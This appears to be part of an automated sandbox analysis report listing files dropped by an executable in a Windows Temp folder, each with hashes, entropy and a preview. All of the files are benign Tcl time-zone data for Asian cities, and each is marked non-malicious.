                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Magadan) {. {-9223372036854775808 36192 0 LMT}. {-1441188192 36000 0 MAGT}. {-1247565600 39600 0 MAGMMTT}. {354891600 43200 1 MAGST}. {370699200 39600 0 MAGT}. {386427600 43200 1 MAGST}. {402235200 39600 0 MAGT}. {417963600 43200 1 MAGST}. {433771200 39600 0 MAGT}. {449586000 43200 1 MAGST}. {465318000 39600 0 MAGT}. {481042800 43200 1 MAGST}. {496767600 39600 0 MAGT}. {512492400 43200 1 MAGST}. {528217200 39600 0 MAGT}. {543942000 43200 1 MAGST}. {559666800 39600 0 MAGT}. {575391600 43200 1 MAGST}. {591116400 39600 0 MAGT}. {606841200 43200 1 MAGST}. {622566000 39600 0 MAGT}. {638290800 43200 1 MAGST}. {654620400 39600 0 MAGT}. {670345200 36000 0 MAGMMTT}. {670348800 39600 1 MAGST}. {686073600 36000 0 MAGT}. {695750400 39600 0 MAGMMTT}. {701784000 43200 1 MAGST}. {717505200 39600 0 MAGT}. {733244400 43200 1 MAGST}. {748969200 39600
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):235
                                                                                                                                                                                                                                                    Entropy (8bit):4.733228681678453
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKCm2OHUVRYQTLQTvUfkc3g/xlHkH8vm+Wv:MBp526mdHsrTD8cQZd7kv
                                                                                                                                                                                                                                                    MD5:82906ADF0FCACBEED34B7F801DDC3024
                                                                                                                                                                                                                                                    SHA1:7E57471D9622F870AE4B8DCC5FEE555A7DCBBDFD
                                                                                                                                                                                                                                                    SHA-256:40B2C3BDA0FA2D0ABE2848C5F435FAE5D80356B439701DAEBDD5F28A1C822B29
                                                                                                                                                                                                                                                    SHA-512:FE9FA3D531A4CE1EBDF6B77E123BA47D8F37A07C59F2107C7AF794AF9959247F74F107556808640190C5AE44F2DBF6CFACCFC6C9AEBB2330953BE78E45A78349
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Makassar) {. {-9223372036854775808 28656 0 LMT}. {-1577951856 28656 0 MMT}. {-1172908656 28800 0 WITA}. {-880272000 32400 0 JST}. {-766054800 28800 0 WITA}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):409
                                                                                                                                                                                                                                                    Entropy (8bit):4.441574068554676
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKefwJm2OHVkezucVAePHZb8vfRvWdAcQzvmy2mRKEjvfgAf5kvfQQC:MBp52G4JmdHnzZBPyHncQzXXjHiH6
                                                                                                                                                                                                                                                    MD5:CCDABEEDF0EC4CC598557F5F7C18568A
                                                                                                                                                                                                                                                    SHA1:D4C3EB158887A7B564DD7462FD8BDD52E95B6B98
                                                                                                                                                                                                                                                    SHA-256:19BA48A251DBCF8435B4D8797AE9EE94CF24D9247A1ADD987B3A6075EB0FE4D3
                                                                                                                                                                                                                                                    SHA-512:A24F2264F258CF502C64FE4EC4ED393D0B74325AB4203D14A97ECEF435D0811196FFA6884328E8B0BCE5348B70665E05549AEB280F880BC901CA6A82E59A938A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Manila) {. {-9223372036854775808 -57360 0 LMT}. {-3944621040 29040 0 LMT}. {-2229321840 28800 0 PHT}. {-1046678400 32400 1 PHST}. {-1038733200 28800 0 PHT}. {-873273600 32400 0 JST}. {-794221200 28800 0 PHT}. {-496224000 32400 1 PHST}. {-489315600 28800 0 PHT}. {259344000 32400 1 PHST}. {275151600 28800 0 PHT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                                                                                    Entropy (8bit):4.754394427749078
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8DhVAIgN6Sn62WFKvE+H+WFKQo:SlSWB9IZaM3yjhVAIgMS62wKLewKQo
                                                                                                                                                                                                                                                    MD5:5D8EBBC297A2258C352BC80535B7F7F1
                                                                                                                                                                                                                                                    SHA1:684CAF480AF5B8A98D9AD1A1ECD4E07434F36875
                                                                                                                                                                                                                                                    SHA-256:4709F2DA036EB96FB7B6CC40859BF59F1146FE8D3A7AFE326FBA3B8CB68049CE
                                                                                                                                                                                                                                                    SHA-512:FD67E920D3D5FE69AF35535A8BBD2791204C6B63050EFECC0857F24D393712C4BC4660EA0A350D2A4DDA144073413BE013D71D73E6F3638CA30480541F9731FA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Dubai)]} {. LoadTimeZoneFile Asia/Dubai.}.set TZData(:Asia/Muscat) $TZData(:Asia/Dubai).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7368
                                                                                                                                                                                                                                                    Entropy (8bit):3.620699686510499
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:EPByq7VKviW/naKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:EPFi//uh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:21EEEC6314C94D1476C2E79BBACFEB77
                                                                                                                                                                                                                                                    SHA1:2C9805CD01C84D446CBDB90B9542CB24CCDE4E39
                                                                                                                                                                                                                                                    SHA-256:7AAB1AC67D96287EE468608506868707B28FCD27A8F53128621801DCF0122162
                                                                                                                                                                                                                                                    SHA-512:D4B0A0E60B102E10E03CF5BD07C5783E908D5E7079B646177C57C30D67B44C114EFF4DCFC71AF8441D67BD5A351068FBFFD8C5E08F06F1D69946B3EA7D49FC2D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Nicosia) {. {-9223372036854775808 8008 0 LMT}. {-1518920008 7200 0 EET}. {166572000 10800 1 EEST}. {182293200 7200 0 EET}. {200959200 10800 1 EEST}. {213829200 7200 0 EET}. {228866400 10800 1 EEST}. {243982800 7200 0 EET}. {260316000 10800 1 EEST}. {276123600 7200 0 EET}. {291765600 10800 1 EEST}. {307486800 7200 0 EET}. {323820000 10800 1 EEST}. {338936400 7200 0 EET}. {354664800 10800 1 EEST}. {370386000 7200 0 EET}. {386114400 10800 1 EEST}. {401835600 7200 0 EET}. {417564000 10800 1 EEST}. {433285200 7200 0 EET}. {449013600 10800 1 EEST}. {465339600 7200 0 EET}. {481068000 10800 1 EEST}. {496789200 7200 0 EET}. {512517600 10800 1 EEST}. {528238800 7200 0 EET}. {543967200 10800 1 EEST}. {559688400 7200 0 EET}. {575416800 10800 1 EEST}. {591138000 7200 0 EET}. {606866400 10800 1 EEST}. {622587600 7200 0 EET}. {638316000 10800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2130
                                                                                                                                                                                                                                                    Entropy (8bit):3.9912071944834855
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ2fen8NXpYVOXgOE2jjyEkFR5Aynx7Xi/X+TipKS5llw+SNXCB3XkE5VXYpobxK:5bfKydR/7Sf+uDyPQ3m302jT2oj
                                                                                                                                                                                                                                                    MD5:A05E0DF442F5CF466EC97D808898B96D
                                                                                                                                                                                                                                                    SHA1:63A63068F7EA2FFA0A7F5A534D71F83FB42E4B5A
                                                                                                                                                                                                                                                    SHA-256:969DB2F0A92F62872D2ABE626CBC2E532690DFF8E577444B577D8D79C23F8962
                                                                                                                                                                                                                                                    SHA-512:7A91A9269400087C5CE1B51C429102B296D16540101C267340A1064CFEB2C6084959D9B84FF8C27285FAC7C19C66F4D1C1E3EAE5EC4949A079C135F30BC9B418
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novokuznetsk) {. {-9223372036854775808 20928 0 LMT}. {-1441259328 21600 0 KRAT}. {-1247551200 25200 0 KRAMMTT}. {354906000 28800 1 KRAST}. {370713600 25200 0 KRAT}. {386442000 28800 1 KRAST}. {402249600 25200 0 KRAT}. {417978000 28800 1 KRAST}. {433785600 25200 0 KRAT}. {449600400 28800 1 KRAST}. {465332400 25200 0 KRAT}. {481057200 28800 1 KRAST}. {496782000 25200 0 KRAT}. {512506800 28800 1 KRAST}. {528231600 25200 0 KRAT}. {543956400 28800 1 KRAST}. {559681200 25200 0 KRAT}. {575406000 28800 1 KRAST}. {591130800 25200 0 KRAT}. {606855600 28800 1 KRAST}. {622580400 25200 0 KRAT}. {638305200 28800 1 KRAST}. {654634800 25200 0 KRAT}. {670359600 21600 0 KRAMMTT}. {670363200 25200 1 KRAST}. {686088000 21600 0 KRAT}. {695764800 25200 0 KRAMMTT}. {701798400 28800 1 KRAST}. {717519600 25200 0 KRAT}. {733258800 28800 1 KRAST}. {748983600 2
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2126
                                                                                                                                                                                                                                                    Entropy (8bit):3.9575220631817074
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ2sIe2lNXh/iOIYyxFRP7z/X9TipN5xCB0wuoC1SQ7x7QwC4Jc/srC2TTV9oOu6:5HYKKy/RP7zf9uXniu7ZTTwOr
                                                                                                                                                                                                                                                    MD5:30BE2EEB01A3794FABBF61FE7D85F8D3
                                                                                                                                                                                                                                                    SHA1:81A6C50077FFECAE5FA86A9785F5BB26C36464FE
                                                                                                                                                                                                                                                    SHA-256:013528D12C8A252F7A3AC908808AFF5CC37181BE54CE8B1D7E1594F06E4907DB
                                                                                                                                                                                                                                                    SHA-512:F40DE8D586686181D8999A6800DBBBD767C77A903865E97E03C8556D2AEED9749F43B9CA249CE2110A8E586FD55507BB408630A8BBBAAEF5A0CDDDDD0BA349DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novosibirsk) {. {-9223372036854775808 19900 0 LMT}. {-1579476700 21600 0 NOVT}. {-1247551200 25200 0 NOVMMTT}. {354906000 28800 1 NOVST}. {370713600 25200 0 NOVT}. {386442000 28800 1 NOVST}. {402249600 25200 0 NOVT}. {417978000 28800 1 NOVST}. {433785600 25200 0 NOVT}. {449600400 28800 1 NOVST}. {465332400 25200 0 NOVT}. {481057200 28800 1 NOVST}. {496782000 25200 0 NOVT}. {512506800 28800 1 NOVST}. {528231600 25200 0 NOVT}. {543956400 28800 1 NOVST}. {559681200 25200 0 NOVT}. {575406000 28800 1 NOVST}. {591130800 25200 0 NOVT}. {606855600 28800 1 NOVST}. {622580400 25200 0 NOVT}. {638305200 28800 1 NOVST}. {654634800 25200 0 NOVT}. {670359600 21600 0 NOVMMTT}. {670363200 25200 1 NOVST}. {686088000 21600 0 NOVT}. {695764800 25200 0 NOVMMTT}. {701798400 28800 1 NOVST}. {717519600 25200 0 NOVT}. {733258800 28800 1 NOVST}. {738090000 25
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2089
                                                                                                                                                                                                                                                    Entropy (8bit):3.8730396740921473
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQaEeHt6l6QFCxZq7LDZgr4jm5+WKvTT5Tm5HTPbEmC5QzCpomuSCh023HlUwCsp:5aapkq9DJ9EHL4mREetpTTyOZ
                                                                                                                                                                                                                                                    MD5:9D93055DC764D1532351DD929F60E178
                                                                                                                                                                                                                                                    SHA1:9E6962D86CFBB0FF375D55DEE2A72ABA6601CA85
                                                                                                                                                                                                                                                    SHA-256:61DF8A038C81BBD1014696C19E3030E1839779A76EC113BB2BAE3A1179638908
                                                                                                                                                                                                                                                    SHA-512:A350E3BC02C52C378C935A075ECE2C94370353480D02FF77E8D9D5EEA70F878B87CF5B173974D082B03D906A115D36B8FE3273D88E9234BACFB055420D7E33C9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Omsk) {. {-9223372036854775808 17610 0 LMT}. {-1582088010 18000 0 OMST}. {-1247547600 21600 0 OMSMMTT}. {354909600 25200 1 OMSST}. {370717200 21600 0 OMST}. {386445600 25200 1 OMSST}. {402253200 21600 0 OMST}. {417981600 25200 1 OMSST}. {433789200 21600 0 OMST}. {449604000 25200 1 OMSST}. {465336000 21600 0 OMST}. {481060800 25200 1 OMSST}. {496785600 21600 0 OMST}. {512510400 25200 1 OMSST}. {528235200 21600 0 OMST}. {543960000 25200 1 OMSST}. {559684800 21600 0 OMST}. {575409600 25200 1 OMSST}. {591134400 21600 0 OMST}. {606859200 25200 1 OMSST}. {622584000 21600 0 OMST}. {638308800 25200 1 OMSST}. {654638400 21600 0 OMST}. {670363200 18000 0 OMSMMTT}. {670366800 21600 1 OMSST}. {686091600 18000 0 OMST}. {695768400 21600 0 OMSMMTT}. {701802000 25200 1 OMSST}. {717523200 21600 0 OMST}. {733262400 25200 1 OMSST}. {748987200 21600 0 O
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1683
                                                                                                                                                                                                                                                    Entropy (8bit):3.967686330951165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ3eHy9r8hb2JJGI4Sdgb88+8g6zcCbYQftQkSbFQvQQGeQZWbWQhKQDccXQfuQn:5FB8hb2GIpco6Z4b
                                                                                                                                                                                                                                                    MD5:4BAEFD23FCA4E54B97FD87022C99A34C
                                                                                                                                                                                                                                                    SHA1:E43F66AD0D661A280D0E738C5E287DE8E470E7ED
                                                                                                                                                                                                                                                    SHA-256:2D551E0CFCDEB165033A91FB36DB2104C1B1A768EACE2BF722E88555A2981072
                                                                                                                                                                                                                                                    SHA-512:6B34B16EFF99CFE6B12E3A2EF503139CBDBAC162B314DE0D031F5EEF5CC5517DA52965D84367E727924157BF19D2F522031D7760EF4F1B321EBB921C05BA0BCD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Oral) {. {-9223372036854775808 12324 0 LMT}. {-1441164324 14400 0 URAT}. {-1247544000 18000 0 URAT}. {354913200 21600 1 URAST}. {370720800 21600 0 URAT}. {386445600 18000 0 URAT}. {386449200 21600 1 URAST}. {402256800 18000 0 URAT}. {417985200 21600 1 URAST}. {433792800 18000 0 URAT}. {449607600 21600 1 URAST}. {465339600 18000 0 URAT}. {481064400 21600 1 URAST}. {496789200 18000 0 URAT}. {512514000 21600 1 URAST}. {528238800 18000 0 URAT}. {543963600 21600 1 URAST}. {559688400 18000 0 URAT}. {575413200 21600 1 URAST}. {591138000 18000 0 URAT}. {606862800 14400 0 URAT}. {606866400 18000 1 URAST}. {622591200 14400 0 URAT}. {638316000 18000 1 URAST}. {654645600 14400 0 URAT}. {662673600 14400 0 URAT}. {692827200 14400 0 ORAT}. {701809200 18000 1 ORAST}. {717530400 14400 0 ORAT}. {733269600 18000 1 ORAST}. {748994400 14400 0 ORAT}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.911861786274714
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8VLYO5YFwVAIgN8ELYOAvN2WFKeHKLNM0WFKELYOun:SlSWB9IZaM3y1LewVAIgKELUvN2wKTNp
                                                                                                                                                                                                                                                    MD5:754059D3B44B7D60FB3BBFC97782C6CF
                                                                                                                                                                                                                                                    SHA1:6AE931805E6A42836D65E4EBC76A58BBFB3DCAF4
                                                                                                                                                                                                                                                    SHA-256:2C2DBD952FDA5CC042073B538C240B11C5C8E614DD4A697E1AA4C80E458575D0
                                                                                                                                                                                                                                                    SHA-512:B5AA4B51699EEAE0D9F91BBAB5B682BD84537C4E2CCE282613E1FFA1DDBE562CA487FB2F8CD006EE9DBC9EFAEFA587EC9998F0364E5C932CDB42C14319328D46
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Bangkok)]} {. LoadTimeZoneFile Asia/Bangkok.}.set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                                                                                    Entropy (8bit):4.513241903916297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKT5wFJm2OHUed9xMkc5k/wGiNCLkvmJdwGiD1HiDF4mwGiLTF/xDHW:MBp52L5wFJmdHFxbc5kwGiwLkIwGiDhY
                                                                                                                                                                                                                                                    MD5:EAC8AF8BEE6ECE49C4A5C97C283AF021
                                                                                                                                                                                                                                                    SHA1:B013A5F4350E41C2C7DBA20C5C521B696048DF55
                                                                                                                                                                                                                                                    SHA-256:221FA8C4DC94963B8ED54196FD02E41CF0B8A1F3405A38C3370EA3AE3C528630
                                                                                                                                                                                                                                                    SHA-512:317A527D4B779FC0DBC82B4808CFD58DC1CA648EE676452C73D927489F34C69B2EB9FA990C70137B94775D7E6087D3B4039D3E5042A7AB7AED18E165740DB515
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pontianak) {. {-9223372036854775808 26240 0 LMT}. {-1946186240 26240 0 PMT}. {-1172906240 27000 0 WIB}. {-881220600 32400 0 JST}. {-766054800 27000 0 WIB}. {-683883000 28800 0 WIB}. {-620812800 27000 0 WIB}. {-189415800 28800 0 WITA}. {567964800 25200 0 WIB}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):265
                                                                                                                                                                                                                                                    Entropy (8bit):4.665742498172264
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wK8cE4Lm2OHnNdRw8v3+zvm1T0vGLp:MBp520cEWmdHnNLv/+zjY
                                                                                                                                                                                                                                                    MD5:03F7E1DBA4E82E33605FECE76F0AE4A8
                                                                                                                                                                                                                                                    SHA1:994E352846828B785AA1757EA311DB9D29E64FA5
                                                                                                                                                                                                                                                    SHA-256:0DDF9DA71DC835702BAD6D3F894C680D925BDD133B43FC6277D4A4F73CB163C3
                                                                                                                                                                                                                                                    SHA-512:FA377EBE94518FED279635F2B6DA211BF385F186086493EFB9FCE18E5371AAD0D62D957BE0C220546977A64462D60EEE718F6AA637D9D36152127479F2CDF2DE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pyongyang) {. {-9223372036854775808 30180 0 LMT}. {-1948782180 30600 0 KST}. {-1830414600 32400 0 JCST}. {-1017824400 32400 0 JST}. {-768646800 32400 0 KST}. {1439564400 30600 0 KST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                    Entropy (8bit):4.8601645539109075
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKK3vFSXGm2OHPFV4YvUQKb3VvVVGF5FRVGwvYv:SlSWB9X52wKK3vTm2OHoYRcvzGfFRVS
                                                                                                                                                                                                                                                    MD5:9462D89F06D17A43817EA860AF040C21
                                                                                                                                                                                                                                                    SHA1:EBAFBD932708A7A7228364BDBFCD864AB4BE9022
                                                                                                                                                                                                                                                    SHA-256:6E1A5814923D6C241E19B14BE409EBD3B6E2A21000B55A76F3E8B185C081F847
                                                                                                                                                                                                                                                    SHA-512:2D5617D7113B349F29AF3EBA4B4321CC0A17B1FBF673E7D23FF7482F3F16235E5070281AD73CF5C74DC019DD39F8DD40D1A4D4DDCC08F8C2B6F6D772F4A85501
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qatar) {. {-9223372036854775808 12368 0 LMT}. {-1577935568 14400 0 GST}. {76190400 10800 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1688
                                                                                                                                                                                                                                                    Entropy (8bit):4.021869489592274
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQweNE9FYaSkXkh8K7hYeO8rmXqI8p/9fIwgdl3xWhf89KukUCN9AC9sdulCddlR:56P0h8UhYqkqI+F7YVYfB8ptOe
                                                                                                                                                                                                                                                    MD5:DF2E642EB0CFE12904C72A4D25663912
                                                                                                                                                                                                                                                    SHA1:69F30DC39AF84B15968CE1EDC14ACCAC3A53C89B
                                                                                                                                                                                                                                                    SHA-256:3B9567139E18C3E7BABA078B8EDB942D1E9E388C7EE44F159D569A713DC7555C
                                                                                                                                                                                                                                                    SHA-512:C31EA6977FF25B8463C8B7D14A1B176C1311E522556A3F8F3C0C54D617CC929927009A870FECF75F52413EDF1E06A12FDFE0A66A9B1974975BB90350ED36C80F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qyzylorda) {. {-9223372036854775808 15712 0 LMT}. {-1441167712 14400 0 KIZT}. {-1247544000 18000 0 KIZT}. {354913200 21600 1 KIZST}. {370720800 21600 0 KIZT}. {386445600 18000 0 KIZT}. {386449200 21600 1 KIZST}. {402256800 18000 0 KIZT}. {417985200 21600 1 KIZST}. {433792800 18000 0 KIZT}. {449607600 21600 1 KIZST}. {465339600 18000 0 KIZT}. {481064400 21600 1 KIZST}. {496789200 18000 0 KIZT}. {512514000 21600 1 KIZST}. {528238800 18000 0 KIZT}. {543963600 21600 1 KIZST}. {559688400 18000 0 KIZT}. {575413200 21600 1 KIZST}. {591138000 18000 0 KIZT}. {606862800 21600 1 KIZST}. {622587600 18000 0 KIZT}. {638312400 21600 1 KIZST}. {654642000 18000 0 KIZT}. {662670000 18000 0 KIZT}. {692823600 18000 0 QYZT}. {695768400 21600 0 QYZT}. {701802000 25200 1 QYZST}. {717523200 21600 0 QYZT}. {733262400 25200 1 QYZST}. {748987200 21600 0 QYZT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):233
                                                                                                                                                                                                                                                    Entropy (8bit):4.700824643200826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wK0GEEm2OHGVXdPZNGVyKFMsDVkvm8Y/s59Ln:MBp52nEEmdHGldPZNGYANkhpn
                                                                                                                                                                                                                                                    MD5:21A8C8B771F9644AB3EAED8CA4512408
                                                                                                                                                                                                                                                    SHA1:27D65D7A9E9403103CADA0C0D507708DD98DFC39
                                                                                                                                                                                                                                                    SHA-256:6CFCB7D781F87E1B7ED88FD2DAD6C80DA921CD55B50A1AC650FD2F787201FE2A
                                                                                                                                                                                                                                                    SHA-512:5292EF66277CCE29F10FB55B054A90FB6B4680D387CB4834FF5BF2F182052B5C3F6A8621A1BCEC4671851EFE8B40B8EFC31CC12F5F45DB380F68BD906F26FEB6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Rangoon) {. {-9223372036854775808 23080 0 LMT}. {-2840163880 23080 0 RMT}. {-1577946280 23400 0 BURT}. {-873268200 32400 0 JST}. {-778410000 23400 0 MMT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                                                                                    Entropy (8bit):4.950902028483272
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFK814tXGm2OHFukevSUi9VswvYv:SlSWB9X52wK81Hm2OHF7ePi9Vs
                                                                                                                                                                                                                                                    MD5:A39D6CB65845A20773E0FDBF12646CB6
                                                                                                                                                                                                                                                    SHA1:59CE58D2C131634EA91B6711D7DF5011AAC1D717
                                                                                                                                                                                                                                                    SHA-256:CD11B8FC28AEB740FBB2AEA75951E8CFFC046ACDEE13AE6F4761808174C2F24C
                                                                                                                                                                                                                                                    SHA-512:ECC47F7EAFDFA8B1580F38DE5ECDBF8DF93BD5F8D2E63B983758F4548155B93CFEF49B8C727DFF3E526CD548564CB93ABC4266210296B3F17491847F9DBABCB9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Riyadh) {. {-9223372036854775808 11212 0 LMT}. {-719636812 10800 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.899371908380106
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8I65eVyVAIgN2h659Q2WFKwJ6h4WFK365ev:SlSWB9IZaM3yJAVyVAIgA4s2wKl4wKKK
                                                                                                                                                                                                                                                    MD5:A978C9AD6320DA94CB15324CA82C7417
                                                                                                                                                                                                                                                    SHA1:585C232F3FB2693C78C7831C1AF1DC25D6824CA7
                                                                                                                                                                                                                                                    SHA-256:73E1850BB0827043024EAFA1934190413CB36EA6FE18C90EA86B9DBC1D61EEBF
                                                                                                                                                                                                                                                    SHA-512:AE48BFB2A348CA992F2BCD6B1AF7495713B0526C326678309133D3271D90600624C096B4B8678AD7ECD19822E3BB24E27D12680FCA7FAA455D3CE324CE0B88ED
